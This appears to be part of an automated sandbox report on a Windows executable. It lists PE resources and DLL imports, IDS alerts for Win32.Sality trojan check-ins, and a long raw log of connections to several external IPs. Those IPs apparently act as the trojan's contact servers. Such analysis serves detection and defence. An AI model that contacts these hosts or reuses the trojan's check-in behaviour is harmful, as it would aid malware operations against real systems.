                                  RT_BITMAP | 0x21b6b4 | 0x158 | data | Chinese | China | 0.997093023255814
                                  RT_BITMAP | 0x21b80c | 0x158 | data | Chinese | China | 1.0203488372093024
                                  RT_BITMAP | 0x21b964 | 0x158 | data | Chinese | China | 1.0232558139534884
                                  RT_BITMAP | 0x21babc | 0x158 | data | Chinese | China | 1.0319767441860466
                                  RT_BITMAP | 0x21bc14 | 0x158 | data | Chinese | China | 1.0319767441860466
                                  RT_BITMAP | 0x21bd6c | 0x158 | data | Chinese | China | 1.0319767441860466
                                  RT_BITMAP | 0x21bec4 | 0x158 | data | Chinese | China | 1.0319767441860466
                                  RT_BITMAP | 0x21c01c | 0x158 | data | Chinese | China | 1.0319767441860466
                                  RT_BITMAP | 0x21c174 | 0x5e4 | data | Chinese | China | 0.9927055702917772
                                  RT_BITMAP | 0x21c758 | 0xb8 | data | Chinese | China | 1.059782608695652
                                  RT_BITMAP | 0x21c810 | 0x16c | data | Chinese | China | 1.0302197802197801
                                  RT_BITMAP | 0x21c97c | 0x144 | data | Chinese | China | 1.0339506172839505
                                  RT_ICON | 0x21cac0 | 0x2e8 | data | Chinese | China | 1.0147849462365592
                                  RT_ICON | 0x21cda8 | 0x128 | data | Chinese | China | 1.037162162162162
                                  RT_ICON | 0x224bf8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 |  |  | 0.299484052532833
                                  RT_MENU | 0x21df78 | 0xc | Non-ISO extended-ASCII text, with no line terminators | Chinese | China | 1.75
                                  RT_MENU | 0x21df84 | 0x284 | data | Chinese | China | 1.0170807453416149
                                  RT_DIALOG | 0x21e208 | 0x98 | data | Chinese | China | 1.0723684210526316
                                  RT_DIALOG | 0x21e2a0 | 0x17a | data | Chinese | China | 1.029100529100529
                                  RT_DIALOG | 0x21e41c | 0xfa | data | Chinese | China | 1.044
                                  RT_DIALOG | 0x21e518 | 0xea | data | Chinese | China | 1.047008547008547
                                  RT_DIALOG | 0x21e604 | 0x8ae | data | Chinese | China | 1.004950495049505
                                  RT_DIALOG | 0x21eeb4 | 0xb2 | data | Chinese | China | 1.0617977528089888
                                  RT_DIALOG | 0x21ef68 | 0xcc | data | Chinese | China | 1.053921568627451
                                  RT_DIALOG | 0x21f034 | 0xb2 | data | Chinese | China | 1.0617977528089888
                                  RT_DIALOG | 0x21f0e8 | 0xe2 | data | Chinese | China | 0.9026548672566371
                                  RT_DIALOG | 0x21f1cc | 0x18c | data | Chinese | China | 0.9090909090909091
                                  RT_STRING | 0x21f358 | 0x50 | data | Chinese | China | 1.1375
                                  RT_STRING | 0x21f3a8 | 0x2c | data | Chinese | China | 1.1818181818181819
                                  RT_STRING | 0x21f3d4 | 0x78 | data | Chinese | China | 1.0916666666666666
                                  RT_STRING | 0x21f44c | 0x1c4 | data | Chinese | China | 1.0243362831858407
                                  RT_STRING | 0x21f610 | 0x12a | data | Chinese | China | 1.0369127516778522
                                  RT_STRING | 0x21f73c | 0x146 | data | Chinese | China | 1.0337423312883436
                                  RT_STRING | 0x21f884 | 0x40 | data | Chinese | China | 1.140625
                                  RT_STRING | 0x21f8c4 | 0x64 | data | Chinese | China | 1.11
                                  RT_STRING | 0x21f928 | 0x1d8 | data | Chinese | China | 1.0233050847457628
                                  RT_STRING | 0x21fb00 | 0x114 | data | Chinese | China | 1.039855072463768
                                  RT_STRING | 0x21fc14 | 0x24 | data | Chinese | China | 1.25
                                  RT_GROUP_CURSOR | 0x21fc38 | 0x14 | data | Chinese | China | 1.45
                                  RT_GROUP_CURSOR | 0x21fc4c | 0x14 | data | Chinese | China | 1.45
                                  RT_GROUP_CURSOR | 0x21fc60 | 0x22 | data | Chinese | China | 1.3235294117647058
                                  RT_GROUP_ICON | 0x225ca4 | 0x14 | data |  |  | 1.2
                                  RT_GROUP_ICON | 0x21fc98 | 0x14 | data | Chinese | China | 1.45
                                  RT_GROUP_ICON | 0x21fcac | 0x14 | data | Chinese | China | 1.45
                                  RT_VERSION | 0x225cbc | 0x25c | data | Chinese | China | 0.478476821192053
                                  RT_MANIFEST | 0x225f1c | 0x2b9 | XML 1.0 document, ASCII text, with very long lines (697), with no line terminators |  |  | 0.5279770444763271
                                  DLL | Import
                                  ADVAPI32.dll | RegCloseKey
                                  COMCTL32.dll |
                                  comdlg32.dll | ChooseColorA
                                  GDI32.dll | LineTo
                                  KERNEL32.DLL | LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                                  ole32.dll | OleRun
                                  OLEAUT32.dll | VariantClear
                                  SHELL32.dll | SHGetMalloc
                                  USER32.dll | GetDC
                                  WINMM.dll | waveOutOpen
                                  WINSPOOL.DRV | ClosePrinter
                                  WLDAP32.dll |
                                  WS2_32.dll | ntohl
                                  Language of compilation system  Country where language is spoken  Map
                                  Chinese                         China
                                  Timestamp  Protocol  SID  Message  Source Port  Dest Port  Source IP  Dest IP
                                  07/05/24-08:03:02.055632TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24987480192.168.2.937.230.104.89
                                  07/05/24-08:01:40.865486TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24976780192.168.2.978.46.2.155
                                  07/05/24-08:03:37.439073TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24992280192.168.2.937.230.104.89
                                  07/05/24-08:01:10.581201TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972680192.168.2.937.230.104.89
                                  07/05/24-08:03:18.862590TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24989780192.168.2.978.46.2.155
                                  07/05/24-08:03:36.115894TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24992080192.168.2.944.221.84.105
                                  07/05/24-08:01:00.866418TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804971144.221.84.105192.168.2.9
                                  07/05/24-08:01:35.879831TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24976080192.168.2.944.221.84.105
                                  07/05/24-08:03:23.798397TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24990480192.168.2.937.230.104.89
                                  07/05/24-08:03:16.967869TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24989480192.168.2.954.244.188.177
                                  07/05/24-08:03:27.764798TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24990880192.168.2.944.221.84.105
                                  07/05/24-08:03:09.855835TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24988480192.168.2.944.221.84.105
                                  07/05/24-08:03:40.317801TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24992680192.168.2.944.221.84.105
                                  07/05/24-08:01:34.578408TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24975880192.168.2.954.244.188.177
                                  07/05/24-08:04:00.742929TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24995480192.168.2.954.244.188.177
                                  07/05/24-08:02:34.184065TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24983780192.168.2.944.221.84.105
                                  07/05/24-08:01:33.065990TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24975780192.168.2.937.230.104.89
                                  07/05/24-08:04:51.558103TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25002480192.168.2.937.230.104.89
                                  07/05/24-08:04:23.796248TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24998680192.168.2.944.221.84.105
                                  07/05/24-08:04:55.640261TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25003080192.168.2.937.230.104.89
                                  07/05/24-08:01:08.741808TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972380192.168.2.944.221.84.105
                                  07/05/24-08:04:28.048137TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24999280192.168.2.944.221.84.105
                                  07/05/24-08:02:14.259539TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24981280192.168.2.944.221.84.105
                                  07/05/24-08:02:09.991240TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24980680192.168.2.944.221.84.105
                                  07/05/24-08:03:22.011379TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24990180192.168.2.944.221.84.105
                                  07/05/24-08:01:27.008203TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24974880192.168.2.954.244.188.177
                                  07/05/24-08:03:33.160392TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24991680192.168.2.937.230.104.89
                                  07/05/24-08:02:03.667336TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24979880192.168.2.978.46.2.155
                                  07/05/24-08:01:04.788881TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24971780192.168.2.944.221.84.105
                                  07/05/24-08:04:45.455182TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25001580192.168.2.944.221.84.105
                                  07/05/24-08:02:27.958118TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24983080192.168.2.937.230.104.89
                                  07/05/24-08:01:24.626884TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24974580192.168.2.944.221.84.105
                                  07/05/24-08:00:59.520486TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24971080192.168.2.944.221.84.105
                                  07/05/24-08:02:18.766398TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24981880192.168.2.978.46.2.155
                                  07/05/24-08:04:41.302467TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25000980192.168.2.944.221.84.105
                                  07/05/24-08:02:23.402046TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24982480192.168.2.978.46.2.155
                                  07/05/24-08:01:21.557942TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24974180192.168.2.978.46.2.155
                                  07/05/24-08:04:35.628594TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25000280192.168.2.954.244.188.177
                                  07/05/24-08:01:59.156855TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24979280192.168.2.944.221.84.105
                                  07/05/24-08:02:21.587514TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24982180192.168.2.954.244.188.177
                                  07/05/24-08:01:54.711893TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24978680192.168.2.944.221.84.105
                                  07/05/24-08:04:42.388055TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25001180192.168.2.978.46.2.155
                                  07/05/24-08:04:49.788119TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25002180192.168.2.944.221.84.105
                                  07/05/24-08:04:37.731319TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25000580192.168.2.978.46.2.155
                                  07/05/24-08:02:16.892207TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24981580192.168.2.954.244.188.177
                                  07/05/24-08:02:26.526857TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24982880192.168.2.944.221.84.105
                                  07/05/24-08:01:20.454312TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24973980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:17.383636951 CEST4973480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:17.383863926 CEST4973480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:17.384350061 CEST804973444.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:17.384641886 CEST4973480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:17.389873028 CEST4973580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:17.393287897 CEST804973444.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:17.394916058 CEST804973544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:17.395035028 CEST4973580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:17.395349979 CEST4973580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:17.400145054 CEST804973544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:17.907382965 CEST804973544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:17.907449961 CEST804973544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:17.907589912 CEST4973580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:17.908282995 CEST4973580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:17.909396887 CEST4973180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:17.909719944 CEST4973680192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:17.913115025 CEST804973544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:17.914653063 CEST804973678.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:17.914725065 CEST804973178.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:17.914757013 CEST4973680192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:17.914838076 CEST4973180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:17.914841890 CEST4973680192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:17.920248032 CEST804973678.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:18.567919016 CEST804973678.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:18.567991018 CEST4973680192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:18.580900908 CEST4973280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:18.581171989 CEST4973780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:18.586958885 CEST804973237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:18.586973906 CEST804973737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:18.587013960 CEST4973280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:18.587068081 CEST4973780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:18.587393999 CEST4973780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:18.594413996 CEST804973737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:19.293400049 CEST804973737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:19.293446064 CEST4973780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:19.340424061 CEST4973780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:19.345619917 CEST804973737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:19.561398983 CEST804973737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:19.562357903 CEST4973780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:19.709352016 CEST4973880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:19.715306044 CEST804973854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:19.715379000 CEST4973880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:19.716191053 CEST4973880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:19.721029997 CEST804973854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:20.445621014 CEST804973854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:20.445682049 CEST804973854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:20.445700884 CEST4973880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:20.445753098 CEST4973880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:20.446521044 CEST4973880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:20.449079037 CEST4973980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:20.451325893 CEST804973854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:20.454066992 CEST804973944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:20.454154968 CEST4973980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:20.454312086 CEST4973980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:20.459659100 CEST804973944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:20.982238054 CEST804973944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:20.982260942 CEST804973944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:20.982305050 CEST4973980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:20.982364893 CEST4973980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:20.982912064 CEST4973980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:20.987652063 CEST804973944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:20.994461060 CEST4974080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:20.999258995 CEST804974044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:20.999346018 CEST4974080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:20.999936104 CEST4974080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:21.004780054 CEST804974044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:21.542736053 CEST804974044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:21.542783022 CEST804974044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:21.542912006 CEST4974080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:21.543908119 CEST4974080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:21.546545982 CEST4973680192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:21.547666073 CEST4974180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:21.548681974 CEST804974044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:21.552035093 CEST804973678.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:21.552488089 CEST4973680192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:21.555301905 CEST804974178.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:21.555485964 CEST4974180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:21.557941914 CEST4974180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:21.562791109 CEST804974178.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:22.208187103 CEST804974178.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:22.208496094 CEST4974180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:22.234869003 CEST4973780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:22.235094070 CEST4974280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:22.239975929 CEST804974237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:22.240035057 CEST804973737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:22.240044117 CEST4974280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:22.240089893 CEST4973780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:22.240417004 CEST4974280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:22.245132923 CEST804974237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:22.961486101 CEST804974237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:22.961746931 CEST4974280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:22.967592001 CEST4974280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:22.972393036 CEST804974237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:23.189316034 CEST804974237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:23.189524889 CEST4974280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:23.305514097 CEST4974380192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:23.310532093 CEST804974354.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:23.310679913 CEST4974380192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:23.310866117 CEST4974380192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:23.315673113 CEST804974354.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:24.076677084 CEST804974354.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:24.076729059 CEST4974380192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:24.076760054 CEST804974354.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:24.077011108 CEST4974380192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:24.077373981 CEST4974380192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:24.079077005 CEST4974480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:24.082107067 CEST804974354.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:24.083909988 CEST804974444.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:24.084007978 CEST4974480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:24.084115028 CEST4974480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:24.088908911 CEST804974444.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:24.617609978 CEST804974444.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:24.617630005 CEST804974444.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:24.617712021 CEST4974480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:24.617712021 CEST4974480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:24.618575096 CEST4974480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:24.621645927 CEST4974580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:24.623325109 CEST804974444.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:24.626580000 CEST804974544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:24.626693010 CEST4974580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:24.626883984 CEST4974580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:24.631643057 CEST804974544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:25.142874002 CEST804974544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:25.142951012 CEST804974544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:25.143028021 CEST4974580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:25.143521070 CEST4974580192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:25.145131111 CEST4974180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:25.145509005 CEST4974680192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:25.148648977 CEST804974544.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:25.151304007 CEST804974178.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:25.151374102 CEST4974180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:25.151412964 CEST804974678.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:25.151484013 CEST4974680192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:25.151668072 CEST4974680192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:25.156514883 CEST804974678.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:25.816407919 CEST804974678.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:25.816468954 CEST4974680192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:25.834973097 CEST4974280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:25.835230112 CEST4974780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:25.842210054 CEST804974737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:25.842314005 CEST4974780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:25.842363119 CEST804974237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:25.842415094 CEST4974280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:25.842606068 CEST4974780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:25.849558115 CEST804974737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:26.572041035 CEST804974737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:26.572096109 CEST4974780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:26.625884056 CEST4974780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:26.630831957 CEST804974737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:26.849797010 CEST804974737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:26.849870920 CEST4974780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:27.002227068 CEST4974880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:27.007014036 CEST804974854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:27.007947922 CEST4974880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:27.008203030 CEST4974880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:27.013462067 CEST804974854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:27.757960081 CEST804974854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:27.758002996 CEST804974854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:27.758023977 CEST4974880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:27.758069992 CEST4974880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:27.759021997 CEST4974880192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:27.760622025 CEST4974980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:27.763854027 CEST804974854.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:27.765537977 CEST804974944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:27.765624046 CEST4974980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:27.765763998 CEST4974980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:27.770741940 CEST804974944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:28.279501915 CEST804974944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:28.279575109 CEST4974980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:28.279746056 CEST804974944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:28.279808044 CEST4974980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:28.280231953 CEST4974980192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:28.285124063 CEST804974944.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:28.349554062 CEST4975080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:28.356412888 CEST804975044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:28.356494904 CEST4975080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:28.356615067 CEST4975080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:28.361505032 CEST804975044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:28.881627083 CEST804975044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:28.881680012 CEST804975044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:28.881737947 CEST4975080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:28.883450031 CEST4975080192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:28.884794950 CEST4974680192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:28.885433912 CEST4975180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:28.888267040 CEST804975044.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:28.889919043 CEST804974678.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:28.889971018 CEST4974680192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:28.891803980 CEST804975178.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:28.891866922 CEST4975180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:28.891998053 CEST4975180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:28.897054911 CEST804975178.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:29.544389009 CEST804975178.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:29.544462919 CEST4975180192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:29.568011999 CEST4974780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:29.568242073 CEST4975280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:29.573117971 CEST804975237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:29.573607922 CEST804974737.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:29.573681116 CEST4974780192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:29.573817015 CEST4975280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:29.573817015 CEST4975280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:29.580477953 CEST804975237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:30.290400982 CEST804975237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:30.290456057 CEST4975280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:30.291455030 CEST4975280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:30.297883034 CEST804975237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:30.515683889 CEST804975237.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:30.515729904 CEST4975280192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:30.634491920 CEST4975380192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:30.640150070 CEST804975354.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:30.640219927 CEST4975380192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:30.640341997 CEST4975380192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:30.646255016 CEST804975354.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:31.365442038 CEST804975354.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:31.365494967 CEST804975354.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:31.365510941 CEST4975380192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:31.365586042 CEST4975380192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:31.366528988 CEST4975380192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:31.368290901 CEST4975480192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:31.371330023 CEST804975354.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:31.374325991 CEST804975444.221.84.105192.168.2.9
